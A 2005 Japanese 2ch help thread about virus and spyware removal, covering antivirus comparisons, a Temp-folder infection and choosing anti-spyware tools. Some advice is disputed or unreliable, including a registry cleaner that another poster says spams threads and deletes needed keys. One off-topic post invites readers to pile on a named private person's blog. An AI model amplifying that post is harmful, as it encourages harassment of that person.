○画像ﾌｧｲﾙのURLを踏む前に
です。よろしくおねがいします。

>>794
日本語で書かれているのでうれしいです。ありがとうございました。
あとでゆっくり見てみます。またよろしくおねがいします。
>>796
それもそうですね。だた、海外の物をダウンロードというのも
心配だったんです。

>>820-821
ここを見るとなんとなくウィルスバスター独特の仕様みたいだね。
ttp://ratan.dyndns.info/avast4/virusest.html

第二回目はトレンドマイクロのウィルスバスター2005。これは購入する余裕が無いので、無料評価版（製品版と同等）にてテストさせて頂きました。
ウィルスバスター2005はとても高機能なセキュリティーソフトです。しかしながら高機能ゆえ、システム負荷が非常に高いのが難点、、
それと常駐監視はそこそこなのですがAvast4のようにウィルスを発見しだい活動を停止するのではなく、ウィルスバスターの場合パソコンに
感染してからのパソコンウィルス活動停止が殆どでした・・これには少し不服です。ただシステムへの影響は限定的。
ウィルスバスター2005の評価
→ウィルス発見率：○
→サイト上からの感染防御率：○
→パソコンウィルス駆除率：○
→動作負荷率：中（推奨PC動作環境、Pentium3、Celeron1.0GHz、Athlon1GHz以上、メモリ128MB以上）
※ウィルスバスターオンラインスキャンのウィルス発見率：△

----------

これはオレも感じる。ウィルスの感染に対する動きが何か変だとは思ってたけど、
ブロックの仕方が変なんだと思う。
そもそもノートンとかならまるわかりのウィルスとかはファイルを作ることすらできないのに、
バスターだとちゃっかり出来てて、それをさも偉そうに駆除しましなんて言ってやがんの。
おいおい！駆除すんなの作るなや！と思いましたよ。ここいらへンにも設計思想の違いが
色濃いんだなぁと思ったですよ。つまり、基本的にウイルスがあるものと思ってるノートンと
ウィルスなんてものはあんまないのだよのバスターということ。

すいません
viewpointがアンイストールできました
問題解決できました

>>824
うむ。報告ご苦労。

今読んでいるのですが・・・
スパイウェアはクッキーを利用して動くという事が書かれていたのですが、
パソコンを切る度にクッキーの削除（一日数回）を行えば
スパイウエア対策ソフトをダウンロードしなくても良いもんでしょうか？

ttp://www.albinoblacksheep.com/flash/open.html

ここを踏んでしまって「You're iddeot」と出たので即、消したのですが
危ないでしょうか？お願いします。

(((((((( ；ﾟДﾟ)))))))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙｶﾞﾀｶﾞﾀﾌﾞﾙｶﾞﾀｶﾞｸｶﾞｸｶﾞｸｶﾞｸｶﾞｸ

>>827
有名なウイルスだと思われ。有害

>>827
これをダウンロードして実行しろ。

Regseeker
ttp://www.hoverdesk.net/freeware.htm
RegSeeker1.3Beta日本語ファイル
ttp://downloads.at

>>826でも書いたのですが、
結構有名はソフトでありそうだし、
無償なのでものすごく有り難いのは確かなのですが、
外国語にどうも抵抗がありまして・・・
（非常事態になっても自分で対処できそうにない）
読み進めていくうちに、だんだん、有料で良いので
店で買える日本語のスパイウェア対策ソフトは無いものかと
思うようになってきました。もしそういう物がなければ、頑張って
解読（英語）しなければと思うのですが、私のような年のものには
かなりキツイ･･･。

>>829>>830
どうもありがとうございました。呆然です････

>>831
どんなに対策しても新種や亜種には効果なしです
あまり神経質になられますな。

>>827
>>830はあちこちのスレにそれをカキコしているクズだ。
不用意に使うと、必要なレジストリが消える。

何度も何度もすみません。
セーフモードでTempのフォルダを空にして
一時ファイルを全て消し、再起動してみたんですが
今まで発見すら出来なかった感染ファイルが姿を現しました。
(単にファイルが多すぎて見落としていただけかも)
普通に削除しようとしたら「指定されたファイルはWindowsが使っています」
というダイアログが出たので、タスクマネージャでiexploreという
プログラムを終了させると削除する事が出来ました。

今までの経緯は>>737>>756>>759>>762>>763>>770>>783>>787です。

しかし、再起動させるとまた新たな感染ファイルがTempに出来てしまうんです。
ちなみに、そのファイル自体をスキャンしてもウィルス反応無し。
「メモリ」という項目をスキャンすると、そのファイルが引っかかります。
iexploreというプログラムは何度消しても勝手に実行されていて
Tempに変なファイルを産んでいるようなので、
レジストリを書き換えない限りは同じ事の繰り返しですよね。
色々と調べていましたが、>>740さんがおっしゃられた通り
大抵はRunを書きかえられるケースが多いようですが
私の場合Runは異常無し。
レジストリの中を「iexplore」で検索をかけてみたら
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\AdvancedOptions\ACCESSIBILITY
に、「HelpID」iexplore.hlp#50041
というものがありました。
これは怪しいキーなのか、削除しても問題無いものなのか自信がありません。

>>833
ありがとうございます。
またお励ましを頂きうれしゅう存じます。
パソコンの使用目的は、ほとんどネットショッピングと
２ちゃんです。アダルトサイトにはいきませぬ。

１．こんな使用具合だから、バスター２００５＆こまめな
　　クッキー＆ファイル削除でどんなもんでしょう？
２．ネットではなくリアルの店舗販売の有料のスパイウェアソフトが
　　あれば教えてくだされ。

この年で夜更かしはキツイです。お返事お待ちしとります。よろしゅうに。
　　

>>836
ちょっと、その変なファイルとかの情報を
画像イメージでアップしてみ。何か変だ。

>>838
なぜかプリントスクリーンが出来なかった(何故・・・)ので
情報を書き込んでみます。

mwhtcorfのプロパティ
mwhtcorf.exe
種類：アプリケーション
場所：C:\WINDOWS\TEMP
サイズ：239KB(244,807バイト)245,760バイト使用
MS-DOSファイル名：MWHTCORF.EXE
作成日時：2005年3月25日 22:16:21
更新日時：2005年3月24日 22:58:12
アクセス日：2005年3月25日
属性：アーカイブのみにチェック

です。ここに生み出されるファイルを消してWinを再起動する度に
ファイル名が変わります。

ごめんなさい！ノートではFnキー＋PrtScrなんですね。
つい最近ノートに換えたのでわかりませんでした。
今更ですが(汗

http://www.uploda.org/file/uporg63697.jpg

私がうｐしたファイルによって誰かに感染したりしないですよね？
大丈夫でしょか・・。

>>837
スパイウェアがcookieを利用するとは限りません。と言うより、利用しないほうが多いでしょう。

Spybotは販売もしています。
http://canon-sol.jp/product/sb/
製品の機能はフリー版と変わらないようです。
今のところSpybotを有料販売しているのは日本だけのようですよ。
有料販売をはじめた理由はわかりませんが（無償で提供するのも金銭的にきつくなっているのも理由のようです）。

他には
PestPatrolというのもあります。
http://www.pestpatrol.jp/

どれがいいかは一概には言えません｡
Spybot,ad-awareともそれぞれ検知しないスパイウェアがありますし、
PastPatrolは誤検知が多いとも聞きますしね。

>>841
おぉ、寝る寸前でした。ありがとうございます。
クッキーを利用しない方が多いとはスパイウェアもややこしいもんですなぁ。
＞製品の機能はフリー版と変わらないようです。
うーーーん、それはツライ･･･。
＞PastPatrolは誤検知が多いとも聞きますしね。
うーーーん、それもつらい。。。
どうせなら無料のAd-Awareの方が良いかな・・よく聞く名前ですし。
悩みますわぁ・・・
明日にでも気合い入れてAd-Aware入れようかなって気になってきました。
でも、例えば、無料のAd-Awareを入れたとしてAd-Awareがいつのまにか
有料に変わってるって事ないでしょうか？英語で書いてるからそれに
気が付かない！って事あったり。
とりあえず、Ad-Awareを入れる方向で、今日は床につきます。
本日はまことにお世話様でした。感謝。

ヤ○ー掲示板で気になるカキコを見つけたのですが、

＞中には必要なスパイウェアが有るので
下手に削除するとソフトが動かなくなってしまう事があるよ

って本当？

>>843
FlashGetとかみたいなやつのことじゃないの?

>>839-840
たぶん、それは有名な大文字のＩＥＸＰＬＯＲＥ．ＥＸＥという名前のウイルスです。
シマンテックかトレンドマイクロのオンラインウイルススキャンを使って検索してみてください。
それで検出られたウイルス名で検索してみてください。
多分、削除だけではなくて、その際にシステムの復元をオフにしなければならないはずです。

>>843
それ本当。前にGoogoleの検索バーを削除されて
えらいめに遭った事がある。
おいおい！便利機能だろうが！

あ、でもスパイ機能はあるわなっていうパターン。

900 名前：最低人類０号 投稿日：2005/03/24(木) 13:57:12 ID:IanK/MEA
>>899
これはwikiのデータベースへ記載する価値あるかもねｗｗｗ

雑音センセイの避難所
ttp://jbbs.livedoor.jp/computer/19209/#1
管理人雑音センセイのご挨拶
「あの掲示板では雑音、録音という単語は使用できない。使用した人間は即刻アク禁にしてやる」

>>782＝842
インストール手順をちゃんと読んでおまへんやろ？
spibotやったら日本語表示になりまっせ。

Ad-Aware SEとspybot・・・オススメとしては両方導入ですわ。
この2種は共存でけるから同時に入れても問題なし。

＞無料のAd-Awareを入れたとしてAd-Awareがいつのまにか有料に変わってるって事ないでしょうか？
ない!!　とか言い切れんけど まぁ今までの経緯からしたらないと思ってええんちゃうかな。

それにしてもえらい心配性でんな。。。
そこまで心配やったら無料版とほぼ同じ機能の有料版spybot購入が一番安心できるんちゃう？
もったいないオバケでそうやけどねｗ

【動機は】雑音犬畜生Part28【何？】
http://tmp4.2ch.net/test/read.cgi/tubo/1107679450/

Ad-Aware SE personalでチェックすると、
何度消しても毎回Tracking Cookieが検出されます。
このソフトでは削除できないんでしょうか。
アドバイスよろしくお願いします。

ブラウザでクッキー食わない設定にするか
SpywareBlasterでも使えば良いだろう

>>850
消せないんじゃなくて
消してもお前が毎回そのクッキーを貰ってきてんだよ

【動機は】雑音犬畜生Part28【何？】
http://tmp4.2ch.net/test/read.cgi/tubo/1107679450/

誤ってセキュリュティ低いままhttps://で始まる怪しい所を開いてし
まったのですが、その時「証明書の有効期限云々」と出たのでさすが
に「いいえ」をクリックしました。そうするとページが開かれません
でした。
調べるとクッキーも作られてなさげです。こっちの情報が相手に逝っ
てるという事はありますか？

さあね

>>854
それはサイト主のみが知る事ですね。

>>845
本当ですか？！有名だったのですね・・。
たしかに大文字ですね。
検索かけても何も出なかった記憶があるのでまさか有名なものとは。
今、トレンドマイクロのオンラインスキャンかけてます。
もうちょっと調べてから進展があったらまたお邪魔します。
本当に何度もすみません。ありがとうございました。

>>843
yes
有名どころはフリーのDivX　ボットで削除すると
DivXが立ち上がらなくなる
FlashGetは現在のアンチスパイツールでは完全削除出来ない
一時削除は出来ても復活が出来る様になってる
漏れはレジストリを見て驚愕した・・・
復活ファイルが物凄く散らばってる　即ｱﾝｽｺ（w

>>854
サイト運営者が客のプライバシーを守るために気使ってhttps暗号化してるだけだろ。
もともとwinに入っているルートCA証明書はベリサインとかセコムとか
カネが高いから（1千万円〜4万円）アフォらしくて払ってられねぇんだろ。
http平文で情報入力させている運営者よりかは正直で健全だよ。

既知外Wプリンが自爆中♪

不倫ブログや写真晒して訴えるとか書いてるんだけど、
どう考えても訴えられるのはこいつなのでプチ祭りです
相手の所属もばればれ〜

病院/医者板
私をもてあそんだ医者!
http://society3.2ch.net/test/read.cgi/hosp/1109921557/
ブログ
ttp://blogs.yahoo.co.jp/rose0maria1105

>>859
暗号化するとウイルスのチェックに引っかからないのを狙ってるパターンあり。
むしろヤバイ。

>>861
君は勘違いしているよ。デマ流さないでね。
httpsの暗号化とウィルスそのものの暗号化を履き違えているみたいだね。
思考力が思わしくないのを自覚してレスは返さないように。以上

>>862
アングラサイトのＳＳＬが親切だ、なんてデマ撒き散らしてる
自分の脳の足りなさは放っておいていいの？（ｗｗｗｗｗ

すいません！
windowsXPsp2のファイアウォールのログはどこで見れますか？？

>>863=861
だからお前は思考回路が切れているんだからレスしないように。
”履き違えている”の意味を理解しろ。

SSLは途中経路でのウィルスチェックには引っかからないが
普通のクライアントが検疫ネットワークをウェブ経由で通信しているわけ無い。

....前頭葉だけでレスしているからどうせ理解できないだろ。

>>863=861
ﾏｼﾞﾜﾛｽ

は、腹ｲﾀｲｨｨｨｨｨｗｗｗｗｗｗｗ

ノートン入れていたらキンタマは防いでくれるのでしょうか？

＞普通のクライアントが検疫ネットワークをウェブ経由で通信しているわけ無い。

解説よろ

>>846
＞＞中には必要なスパイウェアが有るので
＞＞下手に削除するとソフトが動かなくなってしまう事があるよ

＞前にGoogoleの検索バーを削除されて
＞えらいめに遭った事がある。

こういう場合、どうやって、Googoleの検索バーの
復活されたのですか？
また、どのソフトでGoogoleの検索バーが削除されたのですか？